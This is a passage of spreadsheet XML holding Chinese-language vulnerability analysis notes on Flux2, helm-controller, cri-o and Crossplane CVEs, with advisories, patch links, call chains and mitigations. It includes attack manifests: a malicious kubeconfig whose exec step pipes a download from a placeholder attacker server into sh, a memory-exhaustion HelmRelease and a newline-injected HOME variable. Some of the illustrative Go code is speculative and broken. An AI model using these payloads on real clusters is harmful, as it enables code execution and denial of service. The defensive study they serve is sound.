fs := filesys.MakeFsOnDisk()
// 修复后：使用安全的文件系统
fs, err := securefs.MakeFsOnDiskSecure(kg.root)
- 限制文件访问在工作目录内
// 新增工作目录概念
func (r *KustomizationReconciler) generate(
    kustomization kustomizev1.Kustomization,
    workDir string,    // 新增工作目录参数
    dirPath string,
) error
- 阻止对外部文件的引用
临时解决方案：
- 使用 conftest 等工具检查 kustomization.yaml
- 实施文件路径访问策略
- 限制特定路径的访问
---
引入工作目录概念，限制文件操作范围
改进了资源解密处理
增强了文件路径验证
防止循环引用或递归结构
----
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>关键修复点：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
// 使用 visited 映射跟踪已处理的路径
if _, ok := visited[absPath]; ok {
    // 发现循环引用，直接返回
    return nil
}
visited[absPath] = struct{}{}</t>
    </r>
  </si>
  <si>
    <t>check 点-》NewTempDecryptor-&gt;NewDecryptor( 存在包装函数）-&gt; 设置参数
DecryptEnvSources(-》decryptKustomizationEnvSources-》d.sopsDecryptFile（check点）直接支配data, err := os.ReadFile(path)
对应的原dec.decryptDotEnvFiles 
同函数内</t>
  </si>
  <si>
    <t xml:space="preserve">使用了专门的安全路径处理库： secureJoin
</t>
  </si>
  <si>
    <t>错误输出信息明确</t>
  </si>
  <si>
    <t>CVE-2022-24817（类似CVE-2021-41254)</t>
  </si>
  <si>
    <t>利用kubeconfig 进行注入-》 利用前提过高
# kubeconfig 文件中可以定义命令来生成认证令牌
apiVersion: v1
kind: Config
users:
- name: user
  user:
    exec:      # 命令执行定义
      command: "/bin/sh"
      args: ["-c", "malicious command"]  # 恶意命令</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Flux2 is an open and extensible continuous delivery solution for Kubernetes. Flux2 versions between 0.1.0 and 0.29.0, helm-controller 0.1.0 to v0.19.0, and kustomize-controller 0.1.0 to v0.23.0 are vulnerable to Code Injection via malicious Kubeconfig. In multi-tenancy deployments this can also lead to privilege escalation if the controller's service account has elevated permissions. Workarounds include disabling functionality</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> via Validating Admission webhooks by restricting users from setting the `spec.kubeConfig` field in Flux `Kustomization` and `HelmRelease` objects. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>Additional mitigations include applying restrictive AppArmor and SELinux profiles on the controller’s pod to limit what binaries can be executed. This vulnerability is fixed in kustomize-controller v0.23.0 and helm-controller v0.19.0, both included in flux2 v0.29.0</t>
    </r>
  </si>
  <si>
    <t>Package
 github.com/fluxcd/flux2 (
Go
)
Affected versions
&lt; v0.29.0 &gt;= v0.1.0
Patched versions
v0.29.0
 github.com/fluxcd/helm-controller (
Go
)
&lt; v0.19.0 &gt;= v0.2.0
v0.19.0
 github.com/fluxcd/kustomize-controller (
Go
)
&lt; v0.23.0 &gt;= v0.1.0
v0.23.0</t>
  </si>
  <si>
    <t>官方修复：
- kustomize-controller v0.23.0
https://github.com/fluxcd/kustomize-controller/pull/593
https://github.com/fluxcd/kustomize-controller/pull/593/commits/d29032e914c960d0bacad33f46b017e0d632b704
- helm-controller v0.19.0
https://github.com/fluxcd/helm-controller/pull/455
https://github.com/fluxcd/helm-controller/pull/455/commits/6f4ca28c9a05ed0c13a9d76a356738eca395b7f4
- flux2 v0.29.0
Two new flags were added to allow users to enable the use of user.Exec (--insecure-kubeconfig-exec) and InsecureTLS (insecure-kubeconfig-tls) in the kubeconfigs provided for remote apply.</t>
  </si>
  <si>
    <t>https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc</t>
  </si>
  <si>
    <t>a) 直接集群访问权限：
   - 创建 Flux Kustomization/HelmRelease
   - 创建/修改 Kubernetes Secrets
b) Secret 修改权限：
   - 修改现有的 kubeconfig secrets
c) Flux 资源修改权限：
   - 修改 Kustomization/HelmRelease 对象
   - 创建/修改 Secrets
d) Flux Source 访问权限：
   - 对 Git 仓库有写入权限</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">路径 1：
- 创建/修改 Kustomization/HelmRelease
- 引用包含恶意命令的 kubeconfig Secret
路径 2：
- 修改现有 Kustomization/HelmRelease
- 改变其 kubeConfig 引用
---
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击示例：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
# 步骤 1：创建恶意 kubeconfig
apiVersion: v1
kind: Config
clusters:
- name: default
  cluster:
    server: https://kubernetes.default.svc
contexts:
- name: default
  context:
    cluster: default
    user: default
current-context: default
users:
- name: default
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: "/bin/sh"
      args:
      - "-c"
      - "恶意命令，如 curl http://攻击者服务器/payload | sh"
# 步骤2 创建包含恶意kubeconfig的secret
apiVersion: v1
kind: Secret
metadata:
  name: malicious-kubeconfig
  namespace: default  # 或您希望部署的命名空间
type: Opaque
data:
  # 经过 base64 编码的恶意 kubeconfig
  value: &lt;base64-encoded malicious kubeconfig&gt;
# 步骤 3：在 Kustomization 中引用
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
spec:
  kubeConfig:
    secretRef:
      name: malicious-kubeconfig</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Kustomization` and `HelmRelease` objects.
1. 命令注入点在Kubeconfig文件中
#命令注入点： Kubeconfig
apiVersion: v1
kind: Secret
metadata:
  name: malicious-kubeconfig
type: Opaque
data:
  value: &lt;base64-encoded malicious kubeconfig&gt;
-----
2. crd资源引用恶意的kubeconfig文件
# 关键注入点：Kustomization CRD
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
  name: exploit
spec:
  # 注入点 1: 直接引用带有命令执行的 kubeconfig
  kubeConfig:
    secretRef:
      name: exploit-config
# 或者 HelmRelease CRD
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: exploit
spec:
  # 注入点 2: 同样可以引用恶意 kubeconfig
  kubeConfig:
    secretRef:
      name: exploit-config
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击链：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Flux CRD (Kustomization/HelmRelease)
    ↓
引用恶意 kubeconfig Secret
    ↓
kubeconfig 中的命令执行
    ↓
控制器执行命令
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>关键字段：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
spec.kubeConfig.secretRef: # CRD 中引用 Secret 的字段
  name: &lt;secret-name&gt;</t>
    </r>
  </si>
  <si>
    <t>是（ 单字段多资源）</t>
  </si>
  <si>
    <t>通过字段功能推理</t>
  </si>
  <si>
    <t>缺少文档和注释</t>
  </si>
  <si>
    <t>资源引用：引用特定的secret -&gt; secret valuez中注入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>命令执行
reconcile-&gt;impersonation := NewKustomizeImpersonation(kustomization, r.Client, r.StatusPoller, r.DefaultServiceAccount, r.KubeConfigOpts)
 k</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ubeClient, statusPoller, err := impersonation.GetClient(ctx)    
GetClient-&gt;clientForKubeConfig -&gt;
TransportConfig()
</t>
    </r>
  </si>
  <si>
    <t>不存在跨组件但调用深度很深： client-go 中处理 kubeconfig 的exec插件执行了代码
当 Flux 的 kustomize-controller 或 helm-controller 处理引用了恶意 kubeconfig 的 Kustomization 或 HelmRelease 资源时
控制器会读取并使用该 kubeconfig 尝试连接到 Kubernetes 集群
client-go 库中的 exec 认证插件机制会在该控制器容器内执行 kubeconfig 中指定的命令
恶意命令在控制器容器的上下文中运行，拥有与控制器相同的权限</t>
  </si>
  <si>
    <t>不存在跨组件： 存在跨功能模块-&gt; 最后sink点在client-go 库中</t>
  </si>
  <si>
    <t>调用深度：8
reconcile-&gt; kubeClient, statusPoller, err := impersonation.GetClient(ctx)-&gt; ki.clientForKubeConfig(ctx)-&gt;    rrestMapper, err := apiutil.NewDynamicRESTMapper(restConfig)-&gt;
NewDiscoveryClientForConfig-&gt;HTTPClientFor-&gt;TransportFor/HTTPWrappersForConfig/TLSConfigFor-》TransportConfig() -》 UpdateTransportConfig</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">controller
准入控制器：
# 使用准入控制器限制 kubeConfig 字段
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
...
spec:
  rules:
  - operations: ["CREATE", "UPDATE"]
    apiGroups: ["kustomize.toolkit.fluxcd.io"]
    apiVersions: ["v1beta1"]
    resources: ["kustomizations"]
    scope: "Namespaced"
he functionality can be disabled via Validating Admission webhooks (e.g. OPA Gatekeeper, Kyverno) by restricting users from being able to set </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>the spec.kubeConfig field in Flux Kustomization and HelmRelease objects.</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
Applying restrictive AppArmor and SELinux profiles on the controller’s pod to limit what binaries can be executed.</t>
    </r>
  </si>
  <si>
    <t>更改sink点-&gt; 禁止命令执行
---
修复措施：
- 默认禁用 kubeconfig 命令执行
- 需要显式启用 --insecure-kubeconfig-exec
添加标签控制来进行修复：
// 添加新的控制标志
type ControllerConfig struct {
    // 控制是否允许 kubeconfig 中的命令执行
    InsecureKubeconfigExec bool
    // 控制是否允许不安全的 TLS
    InsecureKubeconfigTLS bool
}
// 默认禁用危险特性
InsecureKubeconfigExec = false  // 禁止 exec 命令执行
InsecureKubeconfigTLS = false   // 禁止不安全 TLS
# 需要显式添加标志
--insecure-kubeconfig-exec  # 启用 exec 功能
--insecure-kubeconfig-tls   # 启用不安全 TLS
- 限制文件系统访问
changelog 信息：  Use of file-based KubeConfig options are now permanently disabled (e.g. 
`TLSClientConfig.CAFile`, `TLSClientConfig.KeyFile`, `TLSClientConfig.CertFile`
and `BearerTokenFile`). The drive behind the change was to discourage
insecure practices of mounting Kubernetes tokens inside the controller's container file system.
- Use of `TLSClientConfig.Insecure` in KubeConfig file is disabled by default,
but can enabled at controller level with the flag `--insecure-kubeconfig-tls`.
- Use of `ExecProvider` in KubeConfig file is now disabled by default,
but can enabled at controller level with the flag `--insecure-kubeconfig-exec`.</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>控制器校验：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
新增配置选项，不是简单增加check
对应的选项：KubeConfigOptions， InsecureExecProvider
在reconcile 入口顶层关键操作之前进行了设置
reconcile-&gt; impersonation := NewKustomizeImpersonation(kustomization, r.Client, r.StatusPoller, r.DefaultServiceAccount, r.KubeConfigOpts)  
 kubeClient, statusPoller, err := impersonation</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>.GetClient(</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">ctx)-&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>clientForKubeConfig</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>-&gt; runtimeClient.</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>KubeConfig</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">(restConfig, ki.kubeConfigOpts)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>准入控制器校验：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">OPA Gatekeeper, Kyverno) 配置
</t>
    </r>
  </si>
  <si>
    <t>验证逻辑增加： 添加flag, 禁止</t>
  </si>
  <si>
    <t>在 reconcile 入口到顶层关键操作之前进行设置选项-&gt; 第三层起作用
但距离sink点很远
配置选项有详细的说明</t>
  </si>
  <si>
    <t>CVE-2022-36049(存在于helm-controller中，fluxcd 会调用helm的sdk)</t>
  </si>
  <si>
    <t>类型：资源耗尽导致的拒绝服务(DoS)漏洞
位置：Helm Controller和SDK集成点
原因：特定输入导致内存过度消耗</t>
  </si>
  <si>
    <t xml:space="preserve">动态测试
oss_fuzz
https://issues.oss-fuzz.com/issues/42508858
https://issues.oss-fuzz.com/issues/42512596
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Flux2 is a tool for keeping Kubernetes clusters in sync with sources of configuration, and Flux's helm-controller is a Kubernetes operator that allows one to declaratively manage Helm chart releases. Helm controller is tightly integrated with the Helm SDK. A vulnerability found in the Helm SDK that affects flux2 v0.0.17 until v0.32.0 and helm-controller v0.0.4 until v0.23.0 </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">allows for specific data inputs to cause high memory consumption. </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>In some platforms, this could cause the controller to panic and stop processing reconciliations. In a shared cluster multi-tenancy environment, a tenant could create a HelmRelease that makes the controller panic, denying all other tenants from their Helm releases being reconciled. Patches are available in flux2 v0.32.0 and helm-controller v0.23.0.</t>
    </r>
  </si>
  <si>
    <t>https://github.com/fluxcd/helm-controller/commit/3cd330cc537216d86021675d9ff701bb3d98f1fb#diff-636b2d9b8556d090f81ebb29cd952f88428684befccf637cd1022e060fb45b91</t>
  </si>
  <si>
    <t>helm</t>
  </si>
  <si>
    <t>让我分析这个Helm Controller漏洞的利用前提：
环境前提：
yamlCopy# 必需条件：
- 多租户共享的Kubernetes集群环境
- 集群中部署了Helm Controller
- 运行有漏洞版本的Helm SDK
权限前提：
yamlCopy# 攻击者需要具有以下权限：
- 创建/修改 HelmRelease 资源的权限
- 在特定命名空间的操作权限
- 创建关联资源的权限
架构前提：
yamlCopy# 系统架构要求：
- 使用Flux CD的GitOps部署模式
- Helm Controller用于管理应用发布
- 多租户共享Controller实例
资源前提：
yamlCopy# 需要存在：
- 可用的Helm Repository
- 工作的Chart来源
- 足够的资源配额允许创建HelmRelease
访问前提：
yamlCopy# 攻击者需要：
- 集群的访问凭证
- 相关命名空间的访问权限
- API Server的访问权限</t>
  </si>
  <si>
    <t>1. 恶意租户创建特制的HelmRelease
2. Controller处理此资源时调用Helm SDK
3. 导致内存使用急剧增加
4. Controller最终panic并停止所有reconciliation
恶意租户 -&gt; 创建特制HelmRelease -&gt; 
Controller处理 -&gt; 内存耗尽 -&gt; 
Controller Panic -&gt; 服务中断</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>根据补丁推理得到的资源注入点：
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: memory-exhaust
spec:
  valuesFrom:
    - kind: ConfigMap
      # 可能的攻击路径
      valuesKey: "[[[[....]]]]"  # 深度嵌套导致内存耗尽
      targetPath: "data[0][0][0][0]..."  # 通过数组索引触发内存问题
valuesKey字段：用于指定values数据的位置
targetPath字段：用于指定值合并的目标路径</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
-------
# malicious-helmrelease.yaml
apiVersion: helm.toolkit.fluxcd.io/v2beta1
kind: HelmRelease
metadata:
  name: memory-exhaust
  namespace: default
spec:
  interval: 1m
  chart:
    spec:
      chart: nginx
      version: "1.0.0"
      sourceRef:
        kind: HelmRepository
        name: bitnami
        namespace: default
  values:
    # 创建深度嵌套的数据结构
    recursiveData:
      nested:
        - level1:
            - level2:
                - level3:
                    - level4:
                        - level5: []
    # 创建大量重复的配置项
    configArray:
      - data: &amp;data
          key1: value1
          key2: value2
          key3: *data
          key4: *data
          key5: *data
    # 使用大量嵌套引用
    settings:
      config1: &amp;conf1
        nested: &amp;nest1
          deep: &amp;deep1
            array: &amp;arr1
              - item1
              - *conf1
              - *nest1
              - *deep1
              - *arr1
    # 创建大量重复的环境变量
    containers:
      - name: app
        env:
        - name: VAR1
          value: *data
        - name: VAR2
          value: *conf1
        - name: VAR3
          value: *nest1
        - name: VAR4
          value: *deep1
  # 添加复杂的依赖关系
  dependsOn:
    - name: memory-exhaust
      namespace: default
  # 使用复杂的升级策略
  upgrade:
    remediation:
      retries: 100
      remediateLastFailure: true
    force: true
  # 使用复杂的后备配置
  postRenderers:
    - kustomize:
        patches:
          - target:
              kind: all
            patch: |
              - op: add
                path: /metadata/annotations
                value:
                  {{- range $i, $v := until 1000 }}
                  annotation-{{ $i }}: *data
                  {{- end }}</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">// HelmRelease Controller主要处理流程
func (r *HelmReleaseReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    // 1. 加载HelmRelease资源
    var helmRelease helmv2.HelmRelease
    // 2. 获取Chart内容和values
    values, err := r.getValues(helmRelease)
    // 3. 调用Helm SDK处理values
    // 这里会调用到有问题的内存分配函数
    release, err := r.getOrCreateRelease(ctx, values)
}
// Helm SDK中的问题函数
func (c *Client) getOrCreateRelease(ctx context.Context, values map[string]interface{}) (*release.Release, error) {
    // 处理values时可能发生内存耗尽
    processedValues, err := processValues(values)
    // 创建release对象
    rel, err := c.helmClient.Run(
        chart,
        processedValues,
    )
}
// 可能导致内存耗尽的values处理函数
func processValues(values map[string]interface{}) (map[string]interface{}, error) {
    // 这里对values进行递归处理
    // 当values中包含深度嵌套或循环引用时会导致内存耗尽
    return recursiveProcess(values)
}
----
// 内存分配问题的主要触发点：
func recursiveProcess(data map[string]interface{}) map[string]interface{} {
    result := make(map[string]interface{})
    // 1. 递归处理深度嵌套结构
    for k, v := range data {
        if nested, ok := v.(map[string]interface{}); ok {
            // 递归调用可能导致栈溢出或内存耗尽
            result[k] = recursiveProcess(nested)
        }
    }
    // 2. 处理数组和切片
    if arr, ok := data.([]interface{}); ok {
        // 处理大量数组元素可能导致内存耗尽
        for _, item := range arr {
            // 处理每个数组元素
        }
    }
    return result
}
// values处理时的内存分配
func processArrayValues(arr []interface{}) []interface{} {
    // 1. 为新数组分配内存
    result := make([]interface{}, len(arr))
    // 2. 处理每个元素时可能触发更多内存分配
    for i, v := range arr {
        switch val := v.(type) {
        case map[string]interface{}:
            // 递归处理map
            result[i] = recursiveProcess(val)
        case []interface{}:
            // 递归处理数组
            result[i] = processArrayValues(val)
        }
    }
    return result
}
</t>
  </si>
  <si>
    <t>CVE-2022-4318</t>
  </si>
  <si>
    <t>类型：环境变量注入漏洞
位置：容器的/etc/passwd文件处理
原因：环境变量中换行符导致的注入</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF000000"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">A vulnerability was found in cri-o. This issue allows the addition of arbitrary lines into /etc/passwd by use of </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color rgb="FF417FF9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>a specially crafted environment variable.（container.env）</t>
    </r>
  </si>
  <si>
    <t>all</t>
  </si>
  <si>
    <t>1.26.0
https://github.com/cri-o/cri-o/pull/6450</t>
  </si>
  <si>
    <t>https://github.com/cri-o/cri-o/security/advisories/GHSA-cm9x-c3rh-7rc4</t>
  </si>
  <si>
    <t>环境条件：
- 运行未修复版本的CRI-O (&lt; 1.26.0)
- 未启用SELinux
- 容器内的/etc/passwd可写
权限要求：
- 有权限创建或修改Pod
- 能够设置容器环境变量
- 特别是能够设置HOME环境变量</t>
  </si>
  <si>
    <t xml:space="preserve">a. 创建恶意的Pod 配置
b. 攻击流程
c. 攻击效果-&gt; 容器内权限提升
</t>
  </si>
  <si>
    <t>提权-&gt; 容器内权限提升</t>
  </si>
  <si>
    <t># Pod配置中的env字段
spec:
  containers:
  - name: container-name
    env:                         # 注入点
    - name: HOME                 # HOME环境变量
      value: "malicious\nvalue"  # 通过换行符注入</t>
  </si>
  <si>
    <t>环境变量</t>
  </si>
  <si>
    <t>环境变量注入</t>
  </si>
  <si>
    <t>cri-server</t>
  </si>
  <si>
    <t>CVE-2023-37900</t>
  </si>
  <si>
    <t xml:space="preserve">ada logic 2023 security-audit:ADA-XP-23-16
</t>
  </si>
  <si>
    <t>静态分析-&gt; 人工代码审计（ 通过供应链分析）</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>影响版本：Crossplane 1.11.5、1.12.3 和 1.13.0 之前的版本
Affected versions
&lt; 1.11.5
&lt; 1.12.3
&lt; 1.13.0
&lt;= 1.10.4</t>
  </si>
  <si>
    <t>Patched versions
1.11.5
1.12.3
1.13.0
https://github.com/crossplane/crossplane/pull/4358/commits/e44f73f2a73512671c5f6a25d4ad0ac193394657</t>
  </si>
  <si>
    <t>https://github.com/crossplane/crossplane/security/advisories/GHSA-68p4-95xf-7gx8</t>
  </si>
  <si>
    <t>crossplane</t>
  </si>
  <si>
    <t>创建一个异常大的容器镜像（类似于PoC中展示的9GB+大小）
上传到可访问的容器仓库
在配置中引用该镜像
所需要的利用权限较高</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击者通过提供恶意构造的特大镜像文件
利用Crossplane-runtime解析器在处理大文件时的缺陷
导致内存耗尽，最终导致容器崩溃
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>ada logic 2023 security-audit:ADA-XP-23-16: 有详细的分析和简单的poc</t>
    </r>
  </si>
  <si>
    <t>是
使用的外部引用源，非直接注入
通过解析特大镜像文件（解析注入）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">apiVersion: pkg.crossplane.io/v1
kind: Provider
metadata:
  name: malicious-provider-package
spec:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  package: "malicious-registry.example.com/huge-image:latest"</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  packagePullPolicy: Always
  revisionActivationPolicy: Automatic
  revisionHistoryLimit: 1
  skipDependencyResolution: false</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">文件操作：
k8s.io/apimachinery/pkg/util/yaml.(*YAMLReader).Read() </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>will exhaust
memory if reading from a large reader. The Crossplane-runtime parser parses an image
from a remote registry using Kubernetes’ yaml parser:
https://github.com/crossplane/crossplane-runtime/blob/511b39fa560d40daecec2f9288850f92cc6
2e14b/pkg/parser/parser.go#L94</t>
    </r>
  </si>
  <si>
    <t>CVE-2023-27484</t>
  </si>
  <si>
    <t xml:space="preserve">Fuzz testing, by Ada Logics and sponsored by the CNCF, identified a vulnerability in the fieldpath package from crossplane/crossplane-runtime that an already highly privileged Crossplane user able to create or update Compositions could leverage to cause an out of memory panic in Crossplane.
相关的漏洞： CVE-2023-27483
https://github.com/crossplane/crossplane-runtime/security/advisories/GHSA-vfvj-3m3g-m532
这个漏洞的核心机制是：
Crossplane的Compositions允许用户指定补丁（patches）来在数组中的任意索引位置插入元素
当为Composite Resource选择Composition时，补丁会被评估
如果指定的索引大于目标切片的当前大小，该切片的大小会增加到指定的索引
虽然索引在解析时被限制为uint32的最大值（4294967295），但这仍然是一个不必要的大值
当恶意用户指定一个接近最大值的索引时，系统会尝试分配一个巨大的内存块
这会导致过度的内存使用，最终导致Pod被OOM-Killed（内存不足杀死）
crossplane-runtime的漏洞运作方式：
这个漏洞的运作方式：
fieldpath包中的Paved类型有一个SetValue方法
此方法根据提供的路径在内部对象上设置值，但不会先验证路径
该方法允许在任意特定索引处设置切片中的值
代码会将目标数组增大到所需的大小
索引目前上限为uint32的最大值(4294967295)，但这仍然非常大
当恶意用户提供接近最大值的索引时，会导致过度内存分配
最终可能导致内存耗尽和应用程序崩溃
与CVE-2023-27484的比较
这两个漏洞非常相似，但主要区别在于：
影响范围：
CVE-2023-27484：主要影响Crossplane的Compositions处理
CVE-2023-27483：更广泛，影响任何使用fieldpath包的Paved类型并传入未验证用户输入的应用
攻击向量：
CVE-2023-27484：需要高权限用户访问Compositions
CVE-2023-27483：更基础的库级漏洞，可能被各种使用该库的应用触发
漏洞位置：
CVE-2023-27484：位于Compositions的实现中
CVE-2023-27483：位于更底层的fieldpath包中
</t>
  </si>
  <si>
    <t>动态分析-&gt;ada logics fuzzing testing</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">crossplane-runtime is a set of go libraries used to build Kubernetes controllers in Crossplane and its related stacks. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>In affected versions an already highly privileged user able to create or update Compositions can specify an arbitrarily high index in a patch's `ToFieldPath`, which could lead to excessive memory usage once such Composition is selected for a Composite resource.</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Compositions allow users to specify patches inserting elements into arrays at an arbitrary index. When a Composition is selected for a Composite Resource, patches are evaluated and if a specified index is greater than the current size of the target slice, Crossplane will grow that slice up to the specified index, which could lead to an excessive amount of memory usage and therefore the Pod being OOM-Killed. The index is already capped to the maximum value for a uint32 (4294967295) when parsed, but that is still an unnecessarily large value. This issue has been addressed in versions 1.11.2, 1.10.3, and 1.9.2. Users are advised to upgrade. Users unable to upgrade can restrict write privileges on Compositions to only admin users as a workaround.</t>
